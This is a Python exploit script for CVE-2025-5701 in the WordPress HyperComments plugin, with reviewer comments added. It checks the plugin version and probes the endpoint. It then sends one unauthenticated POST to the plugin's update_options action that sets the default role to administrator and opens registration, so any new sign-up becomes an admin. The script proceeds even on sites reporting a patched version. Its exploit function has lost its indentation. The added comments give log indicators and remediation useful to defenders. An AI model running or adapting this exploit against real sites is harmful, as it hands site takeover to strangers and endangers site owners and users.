import requests
import argparse
import time
import sys
from urllib.parse import urlparse
# Exploit By : Khaled ALenazi (Nxploited )
# Silences urllib3's warnings. Every request in this script passes verify=False,
# so TLS certificates are never validated and urllib3 would otherwise emit an
# InsecureRequestWarning per call; with validation off, a response cannot be
# assumed to come from the host named in the URL.
requests.packages.urllib3.disable_warnings()
def banner():
    """Print the tool's title line and author credit, framed by blank lines."""
    for text in (
        "\nCVE-2025-5701 - Unauthenticated Privilege Escalation Exploit",
        "By: Khaled Alenazi (Nxploited)\n",
    ):
        print(text)
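def _version_key(text):
    """Turn a dotted numeric version string into a comparable tuple of ints.

    Trailing zero components are dropped so "1.2.2.0" and "1.2.2" compare
    equal. Returns None when any component is not purely numeric (for
    example "trunk" or "1.2.2-beta"), because such a value cannot be ordered.
    """
    parts = text.strip().split('.')
    if not all(part.isdecimal() for part in parts):
        return None
    key = [int(part) for part in parts]
    while key and key[-1] == 0:
        key.pop()
    return tuple(key)


def check_version(base_url):
    """Report whether the plugin readme advertises an affected version.

    Fetches wp-content/plugins/hypercomments/readme.txt under *base_url* and
    reads its "Stable tag:" line. The script treats 1.2.2 and earlier as
    affected.

    The comparison is numeric, component by component. A plain string
    comparison would rank "1.10.0" below "1.2.2" and report a newer release
    as affected.

    Reads the module-level ``user_agent`` global, which is only assigned in
    the ``__main__`` block.

    Returns:
        True only when a numeric stable tag at or below 1.2.2 was found.
        False in every other case: newer version, no usable stable tag,
        non-200 response, or any exception (which is printed, not raised).

    NOTE(review): the stable tag is text published in the readme, so the
    result is a hint about exposure rather than proof of what code is
    installed.
    """
    readme_url = base_url.rstrip('/') + '/wp-content/plugins/hypercomments/readme.txt'
    last_affected = (1, 2, 2)
    try:
        # verify=False skips TLS certificate validation, so the readme content
        # is not authenticated as coming from the named host.
        response = requests.get(readme_url, timeout=10, verify=False, headers={"User-Agent": user_agent})
        if response.status_code != 200:
            print("[!] readme.txt not found - proceeding cautiously.")
            return False

        for line in response.text.splitlines():
            if 'Stable tag:' not in line:
                continue
            version = line.split('Stable tag:')[1].strip()
            found = _version_key(version)
            if found is None:
                # Non-numeric tag: no ordering is possible, so it is treated
                # like a missing version rather than guessed at.
                continue
            if found <= last_affected:
                print(f"[+] Target is vulnerable (version: {version}) - proceeding with exploitation.")
                return True
            print(f"[-] Target is not vulnerable (version: {version}) - attempting exploitation anyway.")
            return False

        print("[!] Version string not found in readme.txt - attempting exploitation anyway.")
        return False
    except Exception as e:
        print(f"[!] Error checking readme.txt: {e}")
        return False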
def verify_path(base_url):
    """Probe the plugin's option-update URL with an HTTP OPTIONS request.

    Builds ``<base_url>/wp-admin/index.php?hc_action=update_options`` and
    returns True when the server answers 200 or 405, False for any other
    status or when the request raises (the exception is printed).

    Reads the module-level ``user_agent`` global. TLS certificate validation
    is disabled for the request (verify=False).

    NOTE(review): a 200/405 here only shows that the URL answered; the code
    does not check that the plugin handled the request.
    """
    probe_url = base_url.rstrip('/') + '/wp-admin/index.php?hc_action=update_options'
    try:
        reply = requests.options(
            probe_url,
            headers={"User-Agent": user_agent},
            verify=False,
            timeout=10,
        )
        reachable = reply.status_code in (200, 405)
        if reachable:
            print("[+] Exploit endpoint is accessible.")
        else:
            print("[-] Exploit endpoint not found.")
        return reachable
    except Exception as e:
        print(f"[!] Failed to verify exploit path: {e}")
        return False
# Sends the state-changing request for CVE-2025-5701: a single POST, carrying
# no cookies or credentials, to wp-admin/index.php?hc_action=update_options.
# Its `data` form field is a JSON object that sets the WordPress options
# default_role=administrator and users_can_register=1, so that any later
# self-registration yields an administrator account.
#
# Defender view: in web-server logs this appears as a POST to
# /wp-admin/index.php with hc_action=update_options in the query string. On a
# site suspected of being hit, check those two options and review recently
# registered administrator accounts. Remediation is updating or removing the
# plugin; the fixed version is not stated on this page.
#
# NOTE(review): this listing lost its indentation, so the nesting below is not
# shown. In particular, it cannot be told from here whether the final print()
# belongs to this function or runs at module level.
def Exploit_Nxploited(base_url):
endpoint = base_url.rstrip('/') + '/wp-admin/index.php?hc_action=update_options'
# Form body: one field, `data`, holding the option changes as a JSON string.
data = {
"data": '{"default_role":"administrator","users_can_register":"1"}'
}
# Only Content-Type and User-Agent are sent; user_agent is the module-level
# global assigned in the __main__ block.
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": user_agent
}
try:
time.sleep(3) # Silent wait
# verify=False: the TLS certificate of the target is not validated.
response = requests.post(endpoint, data=data, headers=headers, verify=False, timeout=10)
# Success is inferred from HTTP 200 plus the substring "success" in the body;
# the option values are not read back to confirm the change.
if response.status_code == 200 and "success" in response.text:
print(f"[+] Server response: {response.text.strip()}")
print(f"[+] Registration is now enabled. New users will be assigned administrator role.")
print(f"[+] Register here: {base_url.rstrip('/')}/wp-login.php?action=register")
else:
print(f"[-] Exploit failed. HTTP {response.status_code} - {response.text}")
except Exception as e:
print(f"[!] Exploit request failed: {e}")
print("\nExploit by: Khaled Alenazi (Nxploited)")
def validate_url(url):
    """Return *url* with a scheme, choosing one when the caller gave none.

    A URL that already parses with a scheme is returned unchanged. Otherwise
    an HTTPS GET is attempted (5 s timeout, certificate validation off).
    If it completes, the ``https://`` form is returned. If it raises a
    requests exception, the ``http://`` form is returned without being tested.

    NOTE(review): the scheme test relies on urlparse, so an input such as
    ``host:8080`` may be read as having a scheme and returned as-is.
    Confirm against the Python version in use.
    """
    if urlparse(url).scheme:
        return url

    https_candidate = "https://" + url
    try:
        requests.get(https_candidate, timeout=5, verify=False)
    except requests.exceptions.RequestException:
        return "http://" + url
    return https_candidate
if __name__ == "__main__":
    banner()

    # Module-level global: check_version, verify_path and Exploit_Nxploited
    # read this name directly instead of taking it as a parameter, so those
    # functions only work when the file is run as a script.
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

    cli = argparse.ArgumentParser(
        description="CVE-2025-5701 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)"
    )
    cli.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://site.com)")
    opts = cli.parse_args()

    base_url = validate_url(opts.url)

    # The version check is informational only: its return value is discarded,
    # so a site reporting a newer plugin version is still sent the
    # option-changing request whenever the endpoint probe succeeds.
    check_version(base_url)
    endpoint_reachable = verify_path(base_url)
    if endpoint_reachable:
        Exploit_Nxploited(base_url)